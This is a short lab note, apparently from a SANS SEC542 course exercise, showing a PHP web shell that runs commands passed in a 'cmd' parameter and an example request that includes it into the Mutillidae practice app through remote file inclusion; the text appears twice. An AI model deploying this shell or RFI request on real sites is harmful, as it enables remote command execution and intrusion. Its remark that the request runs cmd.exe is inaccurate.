mosesrenegade/php-shell-542.txt

## php-shell-542.txt
In SANS SEC542, we use a backdoor PHP shell. The excersize uses RFI to include a text copy of the php code into multilidae. Here is how you can 'enhance it'.

Write to a webhost:
nano /var/www/html/id.txt

Inside of id.txt we have some helper functions to debug:

<?php
echo "<pre>";
echo "This is the symbol table:";

echo var_dump($_REQUEST);
echo "Commands:";
echo shell_exec($_REQUEST['cmd']);
echo "</pre>";
?>

If you copy this into a txt file you can then execute the following command:
http://multillidae/index.php?page=http://127.0.0.1/id.txt&cmd=ls

This would result in running cmd.exe. Not the http://127.0.0.1 is because we are running in our local host to our own target.
	In SANS SEC542, we use a backdoor PHP shell. The excersize uses RFI to include a text copy of the php code into multilidae. Here is how you can 'enhance it'.

	Write to a webhost:
	nano /var/www/html/id.txt

	Inside of id.txt we have some helper functions to debug:

	<?php
	echo "<pre>";
	echo "This is the symbol table:";

	echo var_dump($_REQUEST);
	echo "Commands:";
	echo shell_exec($_REQUEST['cmd']);
	echo "</pre>";
	?>

	If you copy this into a txt file you can then execute the following command:
	http://multillidae/index.php?page=http://127.0.0.1/id.txt&cmd=ls

	This would result in running cmd.exe. Not the http://127.0.0.1 is because we are running in our local host to our own target.